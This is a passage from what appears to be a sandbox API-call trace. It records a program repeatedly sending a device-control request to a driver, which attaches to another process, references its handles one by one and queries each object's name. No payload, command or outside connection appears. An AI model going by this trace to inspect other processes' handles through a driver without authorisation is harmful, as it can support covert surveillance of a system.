PriorityBoost=0) [0243.915] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.915] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.915] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x4c, lpOverlapped=0x0) returned 1 [0243.915] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.915] PsAcquireProcessExitSynchronization () returned 0x0 [0243.915] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.915] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0044997a0, HandleInformation=0x0) returned 0x0 [0243.915] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.915] PsReleaseProcessExitSynchronization () returned 0x2 [0243.915] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.915] ObQueryNameString (in: Object=0xfffff8a0044997a0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.915] ObfDereferenceObject (Object=0xfffff8a0044997a0) returned 0x2 [0243.915] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.915] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.915] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.916] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0243.916] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.916] PsAcquireProcessExitSynchronization () returned 0x0 [0243.916] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.916] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800358d580, HandleInformation=0x0) returned 0x0 [0243.916] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.916] PsReleaseProcessExitSynchronization () returned 0x2 [0243.916] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.916] ObQueryNameString (in: Object=0xfffffa800358d580, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.916] ObfDereferenceObject (Object=0xfffffa800358d580) returned 0x2 [0243.916] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.916] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.916] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.916] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0243.916] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.916] PsAcquireProcessExitSynchronization () returned 0x0 [0243.916] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.916] ObReferenceObjectByHandle (in: Handle=0xb8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036e58e0, HandleInformation=0x0) returned 0x0 [0243.917] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.917] PsReleaseProcessExitSynchronization () returned 0x2 [0243.917] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.917] ObQueryNameString (in: Object=0xfffffa80036e58e0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.917] ObfDereferenceObject (Object=0xfffffa80036e58e0) returned 0x2 [0243.917] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.917] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.917] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.917] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0243.917] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.917] PsAcquireProcessExitSynchronization () returned 0x0 [0243.917] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.917] ObReferenceObjectByHandle (in: Handle=0xc0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002912a20, HandleInformation=0x0) returned 0x0 [0243.917] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.917] PsReleaseProcessExitSynchronization () returned 0x2 [0243.917] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.917] ObQueryNameString (in: Object=0xfffffa8002912a20, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.917] ObfDereferenceObject (Object=0xfffffa8002912a20) returned 0x2 [0243.917] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.917] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.917] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.917] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0243.917] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.917] PsAcquireProcessExitSynchronization () returned 0x0 [0243.918] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.918] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800356df20, HandleInformation=0x0) returned 0x0 [0243.918] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.918] PsReleaseProcessExitSynchronization () returned 0x2 [0243.918] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.918] ObQueryNameString (in: Object=0xfffffa800356df20, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.918] ObfDereferenceObject (Object=0xfffffa800356df20) returned 0x2 [0243.918] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.918] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.918] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.918] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.918] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.918] PsAcquireProcessExitSynchronization () returned 0x0 [0243.918] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.918] ObReferenceObjectByHandle (in: Handle=0xd0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0013db060, HandleInformation=0x0) returned 0x0 [0243.918] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.918] PsReleaseProcessExitSynchronization () returned 0x2 [0243.918] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.918] ObQueryNameString (in: Object=0xfffff8a0013db060, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.918] ObfDereferenceObject (Object=0xfffff8a0013db060) returned 0x1 [0243.918] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.918] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.918] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.918] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.919] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.919] PsAcquireProcessExitSynchronization () returned 0x0 [0243.919] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.919] ObReferenceObjectByHandle (in: Handle=0xe4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0012de480, HandleInformation=0x0) returned 0x0 [0243.919] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.919] PsReleaseProcessExitSynchronization () returned 0x2 [0243.919] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.919] ObQueryNameString (in: Object=0xfffff8a0012de480, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.919] ObfDereferenceObject (Object=0xfffff8a0012de480) returned 0x1 [0243.919] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.919] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.919] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.919] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0243.919] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.919] PsAcquireProcessExitSynchronization () returned 0x0 [0243.919] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.919] ObReferenceObjectByHandle (in: Handle=0xe8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800379d920, HandleInformation=0x0) returned 0x0 [0243.919] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.919] PsReleaseProcessExitSynchronization () returned 0x2 [0243.919] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.919] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8508) returned 0x0 [0243.919] ObfDereferenceObject (Object=0xfffffa800379d920) returned 0x1 [0243.919] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.920] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.920] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.920] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.920] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.920] PsAcquireProcessExitSynchronization () returned 0x0 [0243.920] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.920] ObReferenceObjectByHandle (in: Handle=0xf4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000c49060, HandleInformation=0x0) returned 0x0 [0243.920] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.920] PsReleaseProcessExitSynchronization () returned 0x2 [0243.920] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.920] ObQueryNameString (in: Object=0xfffff8a000c49060, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.920] ObfDereferenceObject (Object=0xfffff8a000c49060) returned 0x1 [0243.920] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.920] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.920] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.920] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.920] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.920] PsAcquireProcessExitSynchronization () returned 0x0 [0243.920] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.920] ObReferenceObjectByHandle (in: Handle=0xf8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000c4a5e0, HandleInformation=0x0) returned 0x0 [0243.920] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.920] PsReleaseProcessExitSynchronization () returned 0x2 [0243.920] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.920] ObQueryNameString (in: Object=0xfffff8a000c4a5e0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.920] ObfDereferenceObject (Object=0xfffff8a000c4a5e0) returned 0x1 [0243.920] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.921] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.921] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.921] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.921] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.921] PsAcquireProcessExitSynchronization () returned 0x0 [0243.921] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.921] ObReferenceObjectByHandle (in: Handle=0xfc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000c4b330, HandleInformation=0x0) returned 0x0 [0243.921] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.921] PsReleaseProcessExitSynchronization () returned 0x2 [0243.921] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.921] ObQueryNameString (in: Object=0xfffff8a000c4b330, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.921] ObfDereferenceObject (Object=0xfffff8a000c4b330) returned 0x1 [0243.921] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.921] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.921] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.921] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.921] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.921] PsAcquireProcessExitSynchronization () returned 0x0 [0243.921] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.921] ObReferenceObjectByHandle (in: Handle=0x100, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000c4b6d0, HandleInformation=0x0) returned 0x0 [0243.921] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.921] PsReleaseProcessExitSynchronization () returned 0x2 [0243.921] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.922] ObQueryNameString (in: Object=0xfffff8a000c4b6d0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.922] ObfDereferenceObject (Object=0xfffff8a000c4b6d0) returned 0x1 [0243.922] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.922] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.922] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.922] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.922] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.922] PsAcquireProcessExitSynchronization () returned 0x0 [0243.922] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.922] ObReferenceObjectByHandle (in: Handle=0x104, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0011f3c50, HandleInformation=0x0) returned 0x0 [0243.922] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.922] PsReleaseProcessExitSynchronization () returned 0x2 [0243.922] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.922] ObQueryNameString (in: Object=0xfffff8a0011f3c50, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.922] ObfDereferenceObject (Object=0xfffff8a0011f3c50) returned 0x1 [0243.922] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.922] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.922] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.922] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.922] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.922] PsAcquireProcessExitSynchronization () returned 0x0 [0243.922] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.922] ObReferenceObjectByHandle (in: Handle=0x108, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000c6e410, HandleInformation=0x0) returned 0x0 [0243.922] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.923] PsReleaseProcessExitSynchronization () returned 0x2 [0243.923] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.923] ObQueryNameString (in: Object=0xfffff8a000c6e410, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.923] ObfDereferenceObject (Object=0xfffff8a000c6e410) returned 0x1 [0243.923] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.923] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.923] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.923] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.923] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.923] PsAcquireProcessExitSynchronization () returned 0x0 [0243.923] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.923] ObReferenceObjectByHandle (in: Handle=0x110, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000c4eed0, HandleInformation=0x0) returned 0x0 [0243.923] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.923] PsReleaseProcessExitSynchronization () returned 0x2 [0243.923] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.923] ObQueryNameString (in: Object=0xfffff8a000c4eed0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.923] ObfDereferenceObject (Object=0xfffff8a000c4eed0) returned 0x1 [0243.923] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.923] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.923] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.923] DeviceIoControl (in: 